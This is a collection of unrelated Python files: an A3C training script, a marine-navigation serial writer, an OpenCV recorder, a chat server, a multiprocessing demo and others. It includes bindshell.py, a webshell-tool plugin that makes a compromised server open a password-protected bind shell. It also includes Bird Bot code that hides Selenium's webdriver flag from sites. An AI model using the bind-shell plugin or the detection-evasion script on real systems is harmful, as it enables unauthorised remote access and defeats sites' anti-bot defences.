self.advantages = tf.placeholder(shape=[None], dtype=tf.float32)
self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
# Loss functions
self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1])))
self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
self.policy_loss = -tf.reduce_sum(tf.log(self.responsible_outputs) * self.advantages)
self.loss = 0.5 * self.value_loss + self.policy_loss - self.entropy * 0.01
# Get gradients from local network using local losses
local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
self.gradients = tf.gradients(self.loss, local_vars)
self.var_norms = tf.global_norm(local_vars)
grads, self.grad_norms = tf.clip_by_global_norm(self.gradients, 40.0)
# Apply local gradients to global network
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global_Alloc')
self.apply_grads = trainer.apply_gradients(zip(grads, global_vars))
class Worker():
def __init__(self, game, name, s_size, a_size, trainer, model_path, global_episodes):
self.name = "global_Alloc/worker_" + str(name)
self.number = name
self.model_path = model_path
self.trainer = trainer
self.global_episodes = global_episodes
self.increment = self.global_episodes.assign_add(1)
self.episode_rewards = []
self.episode_lengths = []
self.episode_mean_values = []
self.summary_writer = tf.summary.FileWriter("../Workers/Alloc/%d-%d-%s/train_" % (width, height, file_name) + str(self.number))
# Create the local copy of the network and the tensorflow op to copy global paramters to local network
self.local_AC = AC_Network(s_size, a_size, self.name, trainer)
self.update_local_ops = update_target_graph('global_Alloc', self.name)
self.actions = np.identity(a_size, dtype=bool).tolist()
# End Doom set-up
self.env = game
def train(self, rollout, sess, gamma, bootstrap_value):
rollout = np.array(rollout)
observations = rollout[:, 0]
actions = rollout[:, 1]
rewards = rollout[:, 2]
next_observations = rollout[:, 3]
values = rollout[:, 5]
# Here we take the rewards and values from the rollout, and use them to
# generate the advantage and discounted returns.
# The advantage function uses "Generalized Advantage Estimation"
self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
discounted_rewards = discount(self.rewards_plus, gamma)[:-1]
self.value_plus = np.asarray(values.tolist() + [bootstrap_value])
advantages = rewards + gamma * self.value_plus[1:] - self.value_plus[:-1]
advantages = discount(advantages, gamma)
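# Equivalent to Generalized Advantage Estimation with lambda = 1: the
# one-step TD errors delta_t = r_t + gamma * V(s_{t+1}) - V(s_t) computed
# above are themselves gamma-discounted and summed.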
# Update the global network using gradients from loss
# Generate network statistics to periodically save
feed_dict = {self.local_AC.target_v: discounted_rewards,
self.local_AC.inputs: np.vstack(observations),
self.local_AC.actions: actions,
self.local_AC.advantages: advantages,
self.local_AC.state_in[0]: self.batch_rnn_state[0],
self.local_AC.state_in[1]: self.batch_rnn_state[1]}
v_l, p_l, e_l, g_n, v_n, self.batch_rnn_state, _ = sess.run([self.local_AC.value_loss,
self.local_AC.policy_loss,
self.local_AC.entropy,
self.local_AC.grad_norms,
self.local_AC.var_norms,
self.local_AC.state_out,
self.local_AC.apply_grads],
feed_dict=feed_dict)
return v_l / len(rollout), p_l / len(rollout), e_l / len(rollout), g_n, v_n
def work(self, max_episode_length, gamma, sess, coord, saver):
episode_count = sess.run(self.global_episodes)
total_steps = 0
print("Starting worker " + str(self.number))
with sess.as_default(), sess.graph.as_default():
total_r = 0.0
epis = 0
while not coord.should_stop():
sess.run(self.update_local_ops)
episode_buffer = []
episode_values = []
episode_frames = []
episode_reward = 0
episode_step_count = 0
d = False
#self.env.new_episode()
s = self.env.get_state()
#s = self.env.get_state().screen_buffer
episode_frames.append(s)
s = process_frame(s)
rnn_state = self.local_AC.state_init
self.batch_rnn_state = rnn_state
#while self.env.is_episode_finished() == False:
#prearranged = random.sample(range(25), 20)
array_states = None
array_policies = None
while d == False:
# Take an action using probabilities from policy network output.
a_dist, v, rnn_state = sess.run(
[self.local_AC.policy, self.local_AC.value, self.local_AC.state_out],
feed_dict={self.local_AC.inputs: [s],
self.local_AC.state_in[0]: rnn_state[0],
self.local_AC.state_in[1]: rnn_state[1]})
a = np.random.choice(a_dist[0], p=a_dist[0])
'''
if episode_step_count == 0:
array_states = s.reshape(5, 5)
array_policies = a_dist[0].reshape(5, 5)
else:
array_states = np.concatenate((array_states, s.reshape(5, 5)), axis=0)
array_policies = np.concatenate((array_policies, a_dist[0].reshape(5, 5)), axis=0)
print('s')
print(s.reshape(5,5))
print('p')
print(a_dist[0].reshape(5, 5))
df_csv.to_csv('E130_소지번.csv', sep=',', index=False, header=False)
'''
a = np.argmax(a_dist == a)
#if episode_step_count < -1:
# a = prearranged[episode_step_count]
s1, r, d, rs = self.env.step(a)
if d == False:
episode_frames.append(s1)
s1 = process_frame(s1)
else:
s1 = s
'''
array_states = np.concatenate((array_states, array_policies), axis=1)
df = pd.DataFrame(array_states)
df.to_csv(str(episode_count)+'.csv', sep=',', index=False, header=False)
'''
#transporter.make_long_gif()
epis += 1
#print(episode_step_count)
#print('total')
total_r += episode_reward
#print(episode_reward)
#print(total_r/epis)
episode_buffer.append([s, a, r, s1, d, v[0, 0]])
# If a rearrangement occurred, patch the rewards already recorded in the buffer
if rs is not None:
for step, reward in rs.items():
episode_buffer[step][2] += reward
episode_reward += sum(rs.values())
#episode_reward += r
episode_values.append(v[0, 0])
s = s1
total_steps += 1
episode_step_count += 1
# If the episode hasn't ended, but the experience buffer is full, then we
# make an update step using that experience rollout.
if len(episode_buffer) == 100 and d != True and episode_step_count != max_episode_length - 1:
# Since we don't know what the true final return is, we "bootstrap" from our current
# value estimation.
v1 = sess.run(self.local_AC.value,
feed_dict={self.local_AC.inputs: [s],
self.local_AC.state_in[0]: rnn_state[0],
self.local_AC.state_in[1]: rnn_state[1]})[0, 0]
v_l, p_l, e_l, g_n, v_n = self.train(episode_buffer, sess, gamma, v1)
episode_buffer = []
sess.run(self.update_local_ops)
if d:
print('episode finished with {0} steps and {1} reward'.format(episode_step_count, episode_reward))
break
self.episode_rewards.append(episode_reward)
self.episode_lengths.append(episode_step_count)
self.episode_mean_values.append(np.mean(episode_values))
# Update the network using the episode buffer at the end of the episode.
if len(episode_buffer) != 0:
v_l, p_l, e_l, g_n, v_n = self.train(episode_buffer, sess, gamma, 0.0)
# Periodically save gifs of episodes, model parameters, and summary statistics.
if episode_count % 100 == 0 and episode_count != 0:
if self.name == 'global_Alloc/worker_0' and episode_count % 1000 == 0:
time_per_step = 0.05
images = np.array(episode_frames)
if images.shape[1] != 3:
images = color_frame_continuous(images)
big_images = []
for image in images:
big_images.append(scipy.misc.imresize(image, [width*30, height*30], interp='nearest')) # note: scipy.misc.imresize was removed in SciPy 1.3, so this needs an older SciPy with Pillow
big_images = np.array(big_images)
make_gif(big_images, '../frames/Alloc/%d-%d-%s/image' % (width, height, file_name) + str(episode_count) + '.gif',
duration=len(big_images) * time_per_step, true_image=True, salience=False)
if episode_count % 2000 == 0 and self.name == 'global_Alloc/worker_0':
#saver.save(sess, self.model_path + '/model-' + str(episode_count) + '.cptk')
print("Saved Model")
mean_reward = np.mean(self.episode_rewards[-5:])
mean_length = np.mean(self.episode_lengths[-5:])
mean_value = np.mean(self.episode_mean_values[-5:])
summary = tf.Summary()
summary.value.add(tag='Perf/Reward', simple_value=float(mean_reward))
summary.value.add(tag='Perf/Length', simple_value=float(mean_length))
summary.value.add(tag='Perf/Value', simple_value=float(mean_value))
summary.value.add(tag='Losses/Value Loss', simple_value=float(v_l))
summary.value.add(tag='Losses/Policy Loss', simple_value=float(p_l))
summary.value.add(tag='Losses/Entropy', simple_value=float(e_l))
summary.value.add(tag='Losses/Grad Norm', simple_value=float(g_n))
summary.value.add(tag='Losses/Var Norm', simple_value=float(v_n))
#self.summary_writer.add_summary(summary, episode_count)
self.summary_writer.flush()
if self.name == 'global_Alloc/worker_0':
sess.run(self.increment)
episode_count += 1
max_episode_length = 300
gamma = .99 # discount rate for advantage estimation and reward discounting
width = 7
height = 5
num_blocks = 30
mode = 0
s_size = width * height # observations are the flattened width x height grid
a_size = s_size # one action per grid cell
load_model = True
#input_path = '../data/test_data3.csv'
input_path = None
#file_name = input_path.split('/')[-1][:-4]
file_name = str(num_blocks)
model_path = '../SavedModels/A3C/Alloc/%d-%d-%s' % (width, height, file_name)
tf.reset_default_graph()
if not os.path.exists(model_path):
os.makedirs(model_path)
# Create a directory to save episode playback gifs to
if not os.path.exists('../frames/Alloc'):
os.makedirs('../frames/Alloc')
if not os.path.exists('../frames/Alloc/%d-%d-%s' % (width, height, file_name)):
os.makedirs('../frames/Alloc/%d-%d-%s' % (width, height, file_name))
with tf.device("/cpu:0"):
global_episodes = tf.Variable(0, dtype=tf.int32, name='global_episodes', trainable=False)
trainer = tf.train.AdamOptimizer(learning_rate=1e-4)
master_network = AC_Network(s_size, a_size, 'global_Alloc', None) # Generate global network
num_workers = multiprocessing.cpu_count() # number of available CPU threads (not used below)
workers = []
# Create worker classes (a single worker here; widen the range to use more)
for i in range(1):
workers.append(Worker(Environment(input_path, width, height, i, num_blocks), i, s_size, a_size, trainer, model_path, global_episodes))
variables = slim.get_variables_to_restore()
variables_to_restore = [v for v in variables if v.name.split('/')[0] == 'global_Alloc']
variables_to_restore.append(global_episodes)
saver = tf.train.Saver(variables_to_restore)
with tf.Session() as sess:
coord = tf.train.Coordinator()
if load_model:
print('Loading Model...')
#print_tensors_in_checkpoint_file(file_name=model_path+'/model-21750.cptk', tensor_name='', all_tensors=True)
ckpt = tf.train.get_checkpoint_state(model_path)
saver.restore(sess, ckpt.model_checkpoint_path)
else:
sess.run(tf.global_variables_initializer())
transporter = Transporter(sess, width, height, mode=mode)
# This is where the asynchronous magic happens.
# Start the "work" process for each worker in a separate threat.
worker_threads = []
for worker in workers:
worker.env.set_transporter(transporter)
worker_work = lambda: worker.work(max_episode_length, gamma, sess, coord, saver)
t = threading.Thread(target=(worker_work))
t.start()
sleep(0.5)
worker_threads.append(t)
coord.join(worker_threads)
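# Usage sketch (assumes AC_Network, Worker, Environment, Transporter and the
# helpers process_frame/discount/make_gif/color_frame_continuous are defined
# earlier in this file): run the script directly. It restores the latest
# checkpoint from model_path (load_model = True) and starts one worker thread
# that trains A3C-style against the Environment until interrupted.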
|
serialwriter.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2013 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# parts from this software (AIS decoding) are taken from the gpsd project
# so refer to this BSD license also (see ais.py) or omit ais.py
###############################################################################
from avnserial import *
import avnav_handlerList
from avnav_worker import AVNWorker
hasSerial=False
try:
import serial
hasSerial=True
except:
pass
#a writer class to write to a serial port using pyserial
#on windows use an int for the port - e.g. use 4 for COM5
#on linux use the device name for the port
#this class is not directly a worker that can be instantiated from the config
#instead it is used by worker classes to handle serial output
#basically the configuration is the same as for the reader
#except that autobaud settings are ignored
class SerialWriter(SerialReader):
@classmethod
def getConfigParam(cls):
rt=SerialReader.getConfigParam().copy()
rt.update({
'feederName':'', #if set, use this feeder (if combined use it both for reader and writer)
'combined' : False, #if true, also start a reader
'readFilter':'', #filterstring for reading
'blackList':'' #comma-separated list of sources that we will not send out
})
return rt
#parameters:
#param - the config dict
#writeData - a method used to write a received line (combined mode); must be set
#infoHandler - receives status updates; sourceName - source label, also appended to the blacklist
def __init__(self,param,writeData,infoHandler,sourceName):
for p in ('port','name','timeout'):
if param.get(p) is None:
raise Exception("missing "+p+" parameter for serial writer")
self.param=param
self.infoHandler=infoHandler
self.doStop=False
self.writeData=writeData
if self.writeData is None:
raise Exception("writeData has to be set")
feeder=AVNWorker.findFeeder(self.param.get('feederName'))
if feeder is None:
raise Exception("%s: cannot find a suitable feeder (name %s)",self.getName(),self.param.get('feederName') or "")
self.feeder=feeder
self.addrmap={}
#the serial device
self.device=None
self.buffer=None
self.sourceName=sourceName
self.blackList=[]
if param.get('blackList') is not None:
self.blackList = param.get('blackList').split(',')
self.blackList.append(sourceName)
def stopHandler(self):
self.doStop=True
def openDevice(self,baud,init=False):
self.buffer=''
f=None
try:
pnum=int(self.param['port'])
except:
pnum=self.param['port']
bytesize=int(self.param['bytesize'])
parity=self.param['parity']
stopbits=int(self.param['stopbits'])
xonxoff=int(self.param['xonxoff'])
rtscts=int(self.param['rtscts'])
portname=self.param['port']
timeout=float(self.param['timeout'])
name=self.getName()
if init:
AVNLog.info("openDevice for port %s, baudrate=%d, timeout=%f",
portname,baud,timeout)
init=False
else:
AVNLog.debug("openDevice for port %s, baudrate=%d, timeout=%f",portname,baud,timeout)
lastTime=time.time()
try:
self.setInfoWithKey("writer","opening %s at %d baud"%(portname,baud),AVNWorker.Status.STARTED)
f=serial.Serial(pnum, timeout=timeout, baudrate=baud, bytesize=bytesize, parity=parity, stopbits=stopbits, xonxoff=xonxoff, rtscts=rtscts)
self.setInfoWithKey("writer","port open",AVNWorker.Status.STARTED)
return f
except Exception:
self.setInfoWithKey("writer","unable to open port",AVNWorker.Status.ERROR)
try:
tf=traceback.format_exc(3).decode('ascii','ignore')
except:
tf="unable to decode exception"
AVNLog.debug("Exception on opening %s : %s",portname,tf)
if f is not None:
try:
f.close()
except:
pass
f=None
return f
def writeLine(self,serialDevice,data):
return serialDevice.write(data.encode('ascii','ignore'))
#the run method - just try forever
def run(self):
threading.current_thread().setName("[%s]%s - %s"%(AVNLog.getThreadId(),self.getName(),self.param['port']))
self.device=None
init=True
isOpen=False
AVNLog.debug("started with param %s",",".join(unicode(i)+"="+unicode(self.param[i]) for i in self.param.keys()))
self.setInfoWithKey("writer","created",AVNWorker.Status.STARTED)
startReader=self.param.get('combined')
if startReader is not None and unicode(startReader).upper()=='TRUE':
AVNLog.debug("starting reader")
reader=threading.Thread(target=self.readMethod)
reader.setDaemon(True)
reader.start()
while not self.doStop:
name=self.getName()
timeout=float(self.param['timeout'])
portname=self.param['port']
porttimeout=timeout*10
baud=int(self.param['baud'])
maxerrors=int(self.param['numerrors'])
filterstr=self.param.get('filter')
filter=None
if filterstr != "":
filter=filterstr.split(',')
self.device=self.openDevice(baud,init)
init=False
if self.doStop:
AVNLog.info("handler stopped, leaving")
self.setInfoWithKey("writer","stopped",AVNWorker.Status.INACTIVE)
try:
self.device.close()
self.device=None
except:
pass
return
if self.device is None:
time.sleep(porttimeout/2)
continue
AVNLog.debug("%s opened, start sending data",self.device.name)
lastTime=time.time()
numerrors=0
seq=0
while not self.doStop:
bytes=0
try:
seq,data=self.feeder.fetchFromHistory(seq,10,includeSource=True,nmeafilter=filter)
if len(data)>0:
for line in data:
if line.source in self.blackList:
AVNLog.debug("ignore %s:%s due to blacklist",line.source,line.data)
else:
self.writeLine(self.device,line.data)
except Exception as e:
AVNLog.debug("Exception %s in serial write, close and reopen %s",traceback.format_exc(),portname)
try:
self.device.close()
self.device=None
isOpen=False
seq=0
except:
pass
break
AVNLog.info("stopping handler")
self.setInfoWithKey("writer","stopped",AVNWorker.Status.INACTIVE)
self.deleteInfo()
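# Note: any write error above closes the port and drops back into the outer
# loop, which reopens the device; seq is reset to 0 so fetchFromHistory
# starts over after a reopen.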
#the read method for the combined reader/writer
def readMethod(self):
threading.current_thread().setName("[%s]%s-combinedReader"%(AVNLog.getThreadId(),self.getName()))
self.setInfoWithKey("reader","started",AVNWorker.Status.STARTED)
AVNLog.info("started")
filterstr=self.param.get('readFilter')
filter=None
if filterstr != "":
filter=filterstr.split(',')
hasNmea=False
source=self.sourceName
while not self.doStop:
try:
if self.device is not None:
bytes=self.device.readline(300)
if self.doStop:
AVNLog.info("Stopping reader of combined reader/writer %s",unicode(self.param['port']))
self.deleteInfoWithKey("reader")
return
if bytes is None or len(bytes)==0:
#if there is no data at all we simply take all the time we have...
AVNLog.debug("unable to read data, retrying ")
time.sleep(0.1)
continue
data=bytes.decode('ascii','ignore')
if len(data) < 5:
AVNLog.debug("ignore short data %s",data)
else:
if not NMEAParser.checkFilter(data,filter):
AVNLog.debug("ignore line %s due to not matching filter",data)
continue
if not hasNmea:
self.setInfoWithKey("reader","receiving data",AVNWorker.Status.NMEA)
if self.writeData is not None:
self.writeData(data,source)
else:
AVNLog.debug("unable to write data")
else:
time.sleep(0.5)
except:
AVNLog.debug("exception on read in mixed reader/writer %s (port %s)",traceback.format_exc(),unicode(self.param['port']))
time.sleep(0.5)
hasNmea=False
def setInfo(self,txt,status):
if self.infoHandler is not None:
self.infoHandler.setInfo(self.getName(),txt,status)
def deleteInfo(self):
if self.infoHandler is not None:
self.infoHandler.deleteInfo(self.getName())
def setInfoWithKey(self,key,txt,status):
if self.infoHandler is not None:
self.infoHandler.setInfo(self.getName()+"-"+key,txt,status)
def deleteInfoWithKey(self,key):
if self.infoHandler is not None:
self.infoHandler.deleteInfo(self.getName()+"-"+key)
#a Worker to directly write to a serial line using pyserial
#on windows use an int for the port - e.g. use 4 for COM5
#on linux use the device name for the port
#if no data is received within timeout *10 the port is closed and reopened
#this gives the chance to handle dynamically assigned ports with no issues
class AVNSerialWriter(AVNWorker):
@classmethod
def getConfigName(cls):
return "AVNSerialWriter"
@classmethod
def getConfigParam(cls,child):
if child is not None:
return None
cfg=SerialWriter.getConfigParam()
rt=cfg.copy()
return rt
@classmethod
def createInstance(cls, cfgparam):
if not hasSerial:
AVNLog.warn("serial writers configured but serial module not available, ignore them")
return None
rt=AVNSerialWriter(cfgparam)
return rt
def __init__(self,param):
for p in ('port','timeout'):
if param.get(p) is None:
raise Exception("missing "+p+" parameter for serial writer")
AVNWorker.__init__(self, param)
#thread run method - just try forever
def run(self):
self.setName(self.getThreadPrefix())
writer=SerialWriter(self.param,self.writeData,self,self.getSourceName(self.getParamValue('port')))
writer.run()
avnav_handlerList.registerHandler(AVNSerialWriter)
|
recording_video_with_opencv_multithreading.py
|
from threading import Thread
import cv2
import time
class VideoWriterWidget(object):
def __init__(self, video_file_name, src=0):
# Create a VideoCapture object
self.frame_name = str(src)
self.video_file = video_file_name
self.video_file_name = video_file_name + '.avi'
self.capture = cv2.VideoCapture(src)
# Default resolutions of the frame are obtained (system dependent)
self.frame_width = int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH))
self.frame_height = int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
# Set up codec and output video settings
self.codec = cv2.VideoWriter_fourcc('M','J','P','G')
self.output_video = cv2.VideoWriter(self.video_file_name, self.codec, 30, (self.frame_width, self.frame_height))
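# Note: the writer above assumes a fixed 30 FPS; if the source delivers a
# different rate, the recording will play back too fast or too slow. Querying
# self.capture.get(cv2.CAP_PROP_FPS) would be one way to match the source.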
# Start the thread to read frames from the video stream
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.thread.start()
# Start another thread to show/save frames
self.start_recording()
print('initialized {}'.format(self.video_file))
def update(self):
# Read the next frame from the stream in a different thread
while True:
if self.capture.isOpened():
(self.status, self.frame) = self.capture.read()
def show_frame(self):
# Display frames in main program
if self.status:
cv2.imshow(self.frame_name, self.frame)
# Press Q on keyboard to stop recording
key = cv2.waitKey(1)
if key == ord('q'):
self.capture.release()
self.output_video.release()
cv2.destroyAllWindows()
exit(1)
def save_frame(self):
# Save obtained frame into video output file
self.output_video.write(self.frame)
def start_recording(self):
# Create another thread to show/save frames
def start_recording_thread():
while True:
try:
self.show_frame()
self.save_frame()
except AttributeError:
pass
self.recording_thread = Thread(target=start_recording_thread, args=())
self.recording_thread.daemon = True
self.recording_thread.start()
if __name__ == '__main__':
src1 = 'Your link1'
video_writer_widget1 = VideoWriterWidget('Camera 1', src1)
src2 = 'Your link2'
video_writer_widget2 = VideoWriterWidget('Camera 2', src2)
src3 = 'Your link3'
video_writer_widget3 = VideoWriterWidget('Camera 3', src3)
# Since each video player is in its own thread, we need to keep the main thread alive.
# Keep spinning using time.sleep() so the background threads keep running
# Threads are set to daemon=True so they will automatically die
# when the main thread dies
while True:
time.sleep(5)
|
bindshell.py
|
from libs.config import alias, color
from libs.myapp import send
from libs.functions.webshell_plugins.bindshell import *
from threading import Thread
from time import sleep
@alias(True, func_alias="bs", _type="SHELL")
def run(port: int = 7777, passwd: str = "doughnuts"):
"""
bind shell
Bind a port and wait for someone to connect to get a shell.
eg: bindshell {port=7777} {passwd=doughnuts}
"""
t = Thread(target=send, args=(get_php_binshell(str(port), passwd), ))
t.daemon = True
t.start()
sleep(1)
if t.is_alive():
print(f"\nBind {port} {color.green('success')}. Password is {color.green(passwd)}\n")
else:
print(f"\nBind {port} {color.red('error')}\n")
|
utils.py
|
from colorama import init, Fore, Back, Style
from datetime import datetime
from selenium.webdriver import Chrome, ChromeOptions
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from webhook import DiscordWebhook, DiscordEmbed
from chromedriver_py import binary_path as driver_path
import json, platform, darkdetect, random, settings, threading
if platform.system == "Windows":
init(convert=True)
normal_color = Fore.WHITE
else:
init()
normal_color = Fore.WHITE if darkdetect.isDark() else Fore.BLACK
print(normal_color + "Welcome To Bird Bot")
class BirdLogger:
def ts(self):
return str(datetime.now())[:-7]
def normal(self,task_id,msg):
print(normal_color + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def alt(self,task_id,msg):
print(Fore.MAGENTA + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def error(self,task_id,msg):
print(Fore.RED + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def success(self,task_id,msg):
print(Fore.GREEN + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def return_data(path):
with open(path,"r") as file:
data = json.load(file)
return data
def write_data(path,data):
with open(path, "w") as file:
json.dump(data, file)
def get_profile(profile_name):
profiles = return_data("./data/profiles.json")
for p in profiles:
if p["profile_name"] == profile_name:
return p
return None
def get_proxy(list_name):
if list_name == "Proxy List" or list_name == "None":
return False
proxies = return_data("./data/proxies.json")
for proxy_list in proxies:
if proxy_list["list_name"] == list_name:
return format_proxy(random.choice(proxy_list["proxies"].splitlines()))
return None
def format_proxy(proxy):
try:
proxy_parts = proxy.split(":")
ip, port, user, passw = proxy_parts[0], proxy_parts[1], proxy_parts[2], proxy_parts[3]
return {
"http": "http://{}:{}@{}:{}".format(user, passw, ip, port),
"https": "https://{}:{}@{}:{}".format(user, passw, ip, port)
}
except IndexError:
return {"http": "http://" + proxy, "https": "https://" + proxy}
def send_webhook(webhook_type,site,profile,task_id,image_url):
if settings.webhook !="":
webhook = DiscordWebhook(url=settings.webhook, username="Bird Bot", avatar_url="https://i.imgur.com/fy26LbM.png")
if webhook_type == "OP":
if not settings.webhook_on_order:
return
embed = DiscordEmbed(title="Order Placed",color=0x34c693)
elif webhook_type == "B":
if not settings.webhook_on_browser:
return
embed = DiscordEmbed(title="Complete Order in Browser",color=0xf2a689)
elif webhook_type == "PF":
if not settings.webhook_on_failed:
return
embed = DiscordEmbed(title="Payment Failed",color=0xfc5151)
embed.set_footer(text="Via Bird Bot",icon_url="https://i.imgur.com/fy26LbM.png")
embed.add_embed_field(name="Site", value=site,inline=True)
embed.add_embed_field(name="Profile", value=profile,inline=True)
embed.add_embed_field(name="Task ID", value=task_id,inline=True)
embed.set_thumbnail(url=image_url)
webhook.add_embed(embed)
try:
webhook.execute()
except:
pass
def open_browser(link,cookies):
threading.Thread(target = start_browser, args=(link,cookies)).start()
def start_browser(link,cookies):
caps = DesiredCapabilities().CHROME
caps["pageLoadStrategy"] = "eager"
chrome_options = ChromeOptions()
chrome_options.add_experimental_option("excludeSwitches", ["enable-automation"])
chrome_options.add_experimental_option("useAutomationExtension", False)
driver = Chrome(desired_capabilities=caps, executable_path=driver_path, options=chrome_options)
driver.execute_cdp_cmd(
"Page.addScriptToEvaluateOnNewDocument",
{
"source": """
Object.defineProperty(window, 'navigator', {
value: new Proxy(navigator, {
has: (target, key) => (key === 'webdriver' ? false : key in target),
get: (target, key) =>
key === 'webdriver'
? undefined
: typeof target[key] === 'function'
? target[key].bind(target)
: target[key]
})
})
"""
},
)
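# The injected script above wraps window.navigator in a Proxy so that the
# 'webdriver' property reads as undefined on every new document, hiding the
# usual Selenium automation fingerprint from the page.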
try:
driver.get(link)
for cookie in cookies:
driver.add_cookie({
"name": cookie.name,
"value" : cookie.value,
"domain" : cookie.domain
})
driver.get(link)
except:
pass
|
server.py
|
import socket
import sys
from threading import *
import time
import traceback
import logging
from logging.handlers import RotatingFileHandler
import os
# create logger
logger = logging.getLogger('WIZARD-CHAT')
logger.setLevel(logging.DEBUG)
log_file = os.path.join('{}/Documents/wizard/log/'.format(os.getenv("USERPROFILE")), "wizard_chat.log")
if not os.path.isdir(os.path.dirname(log_file)):
os.makedirs(os.path.dirname(log_file))
# create file handler and set level to debug
file_handler = RotatingFileHandler(log_file, mode='a', maxBytes=1000000, backupCount=1000, encoding=None, delay=False)
# create console handler and set level to debug
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to handlers
stream_handler.setFormatter(formatter)
file_handler.setFormatter(formatter)
# add handlers to logger
logger.addHandler(stream_handler)
logger.addHandler(file_handler)
logger.info("Python : " + str(sys.version))
class server(Thread):
def __init__(self):
super(server, self).__init__()
hostname = socket.gethostname()
## getting the IP address using socket.gethostbyname() method
ip_address = socket.gethostbyname(hostname)
port = 5034
logger.info("Starting chat server on : '" + str(ip_address) + "'")
logger.info("Default port : '" + str(port) + "'")
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind((ip_address, port))
self.server.listen(100)
logger.info("Chat server started")
self.list_of_clients = []
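# each entry in list_of_clients is [socket, connect-timestamp]; the same list
# object is handed to the client thread so remove() can find it again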
def run(self):
while True:
try:
conn, addr = self.server.accept()
conn_id = [conn, time.time()]
self.list_of_clients.append(conn_id) # append the same object so remove() can match it later
Thread(target=self.clientThread, args=(conn_id, addr)).start()
time.sleep(0.05)
logger.info("New client : "+str(conn_id) + str(addr))
except:
logger.error(str(traceback.format_exc()))
continue
def clientThread(self, conn, addr):
try_count = 0
while try_count<3:
try:
message = conn[0].recv(2048)
if message:
self.broadcast(message, conn)
time.sleep(0.1)
else:
self.remove(conn)
break
except (ConnectionResetError, ConnectionAbortedError):
try_count+=1
logger.info("Removing client : " + str(conn))
self.remove(conn)
break
except:
try_count+=1
logger.error(str(traceback.format_exc()))
continue
def broadcast(self, message, conn):
logger.debug("Broadcasting : " + str(message))
for client in self.list_of_clients:
try:
client[0].send(message)
except:
client[0].close()
self.remove(client)
def remove(self, connection):
if connection in self.list_of_clients:
self.list_of_clients.remove(connection)
logger.info('Removing client : ' + str(connection))
if __name__ == "__main__":
try:
server = server()
server.daemon = True
server.start()
print('Press Ctrl+C to quit...')
while True: time.sleep(1)
except KeyboardInterrupt:
print('Stopping server...')
sys.exit()
|
demo6.py
|
"""
【Python多任务编程】父子进程数据共享问题 2019/11/02 14:50
"""
# TODO: 进程间数据不共享
"""
在一个程序中,如果创建了一个子进程,那么这个子进程会拷贝一份当前进程所有的资源作为子进程的运行环境。
也就是说,子进程中的变量可能跟父进程一样,但其实是另外一个块内存区域了。他们之间的数据是不共享的。
所有资源:变量,函数,class 类等
"""
from multiprocessing import Process
AGE = 1
def greet(names):
global AGE
AGE += 1
names.append('ketang')
print('===== child process =====')
print('AGE value: %d, id: %s' % (AGE, id(AGE)))
print('names: %s' % (names,))
print('===== end of child process =====')
if __name__ == '__main__':
names = ['zhiliao']
# greet(names)
p = Process(target=greet, args=(names,))
p.start()
p.join()
print('===== parent process =====')
print('AGE value: %d, id: %s' % (AGE, id(AGE)))
print('names: %s' % (names,))
print('===== end of parent process =====')
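# For contrast, a minimal sketch of real cross-process sharing (standard
# library only; the names bump/shared_age are illustrative): multiprocessing.Value
# allocates shared memory, so the child's increment is visible to the parent,
# unlike the copied global AGE above.
from multiprocessing import Value
def bump(age):
with age.get_lock():
age.value += 1
if __name__ == '__main__':
shared_age = Value('i', 1)
p2 = Process(target=bump, args=(shared_age,))
p2.start()
p2.join()
print('shared AGE value: %d' % shared_age.value) # prints 2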
|
main.py
|
# !!! NOTE !!!
# Any code in this project (yibanAutocheakin) is for study, testing and research only; commercial use is forbidden.
# !!!!!!!!!!!!!!!!!!!! IMPORTANT !!!!!!!!!!!!!!!!!!!!
# If you develop fever, dry cough, chills, general discomfort, chest pain, congestion, runny nose, nausea, diarrhea or similar symptoms,
# stop using this project (yibanAutocheakin) immediately, fulfil your social obligations in good faith and report your health status promptly.
# !!!!!!!!!!!!!!!!!!!! IMPORTANT !!!!!!!!!!!!!!!!!!!!
# In case of infringement, please provide the relevant proof of ownership; the author will delete the files concerned upon receipt.
# Anyone who views, copies or uses any script in this project (yibanAutocheakin) in any way should read this statement carefully. The author reserves the right to change or amend this disclaimer at any time.
